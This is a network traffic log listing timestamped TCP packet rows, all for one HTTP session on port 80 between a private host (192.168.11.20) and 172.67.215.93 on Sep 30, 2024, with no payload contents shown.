Sep 30, 2024 15:10:14.519582987 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.519629955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.519687891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.519699097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.519710064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.519721985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.519818068 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.519987106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.520155907 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.520638943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.520652056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.520684004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.520697117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.520756006 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.520926952 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.521219969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.521272898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.521297932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.521338940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.521553993 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.521553993 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.522095919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.522145033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.522156954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.522202015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.522542953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.522542953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.522542953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.524051905 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.524080992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.524094105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.524131060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.524624109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.524624109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.551608086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.551657915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.551842928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.552017927 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.552408934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.552473068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.552499056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.552510977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.552869081 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.552869081 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.552906990 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.554552078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.554635048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.554687977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.554701090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.554795980 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.554986954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.555006981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.555058956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.555269003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.555327892 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.555741072 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.555741072 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.555741072 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.555778980 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.555871010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.555955887 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.556009054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.556020975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.556713104 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.556713104 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.556801081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.556854963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.556870937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.556895971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.557183981 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.557570934 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.557585001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.557600975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.557712078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.557725906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.557738066 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.557848930 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.557986021 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.558449984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.558561087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.558578014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.558581114 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.558589935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.558968067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.559602976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.559731007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.559797049 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.559814930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.559828043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.559967041 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.560101032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.560138941 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.560209036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.560262918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.560275078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.560358047 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.560527086 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.561005116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.561053991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.561114073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.561166048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.561522007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.561536074 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.561908007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.561959982 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.561971903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.561984062 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.562470913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.562472105 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.562779903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.562829971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.562844992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.562894106 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.563422918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.563422918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.563664913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.563704014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.563714981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.563725948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.563875914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.563970089 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.564614058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.564649105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.564666033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.564678907 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.565310001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.565387011 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.565387011 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.565390110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.565447092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.565565109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.565924883 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.566260099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.566313982 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.566325903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.566338062 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.566350937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.566524029 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.566699982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.566699982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.567001104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.567049980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.567121029 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.567169905 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.567488909 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.567488909 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.567488909 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.567822933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.567938089 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.568269014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.568362951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.568375111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.568386078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.568563938 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.568563938 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.568598986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.568753958 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.569264889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.569310904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.569385052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.569452047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.569608927 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.569608927 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.569608927 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.569991112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.570041895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.570107937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.570161104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.570528984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.570528984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.570528984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.570883989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.570939064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.570951939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.571091890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.571429014 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.571429014 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.571679115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.571731091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.571860075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.571943045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.572395086 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.572395086 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.572973013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.573052883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.573096037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.573107958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.573386908 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.573386908 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.573426962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.573478937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.573544979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.573596954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.573760986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.573760986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.574271917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.574321032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.574382067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.574402094 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.574436903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.574575901 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.574575901 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.574770927 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.575077057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.575196981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.575278997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.575290918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.575397015 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.575587988 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.575743914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.575965881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.576014996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.576085091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.576136112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.576273918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.576273918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.576273918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.576442003 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.576992035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.577042103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.577054024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.577065945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.577279091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.577279091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.577682018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.577761889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.577775002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.577816963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.577969074 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.577969074 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.578489065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.578581095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.578632116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.578643084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.579381943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.579381943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.579381943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.580684900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.580785990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.580852032 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.580864906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.580878019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.581018925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.581022978 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.581142902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.581192970 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.581242085 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.581300020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.581311941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.581324100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.581396103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.581413031 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.581583023 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.581583023 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.581706047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.581922054 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.608901978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.608916998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.608928919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.608939886 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.608952045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.608983994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.608995914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.609006882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.609019041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.609030008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.609617949 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.609617949 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.610147953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.610263109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.610369921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.610546112 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.610546112 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.610546112 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.611170053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.611289978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.611402035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.611515999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.611516953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.611694098 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.611952066 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.612540007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.615494967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.615699053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.615710974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.615936041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.615936041 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.615988970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.616000891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.616117001 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.616309881 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.616477013 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.616671085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.616709948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.616722107 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.616760015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.616812944 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.616879940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.616982937 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.617088079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.617145061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.617202044 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.617310047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.617372990 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.617372990 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.617378950 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.617508888 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.617590904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.617693901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.617755890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.617760897 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.617830992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.617842913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.618099928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.618100882 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.619080067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.619280100 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.619307041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.619498968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.619546890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.619643927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.619693995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.619718075 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.619929075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.619980097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.620279074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.620358944 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.620359898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.620359898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.620359898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.620424032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.620461941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.620605946 CEST	80	49754	172.67.215.93	192.168.11.20
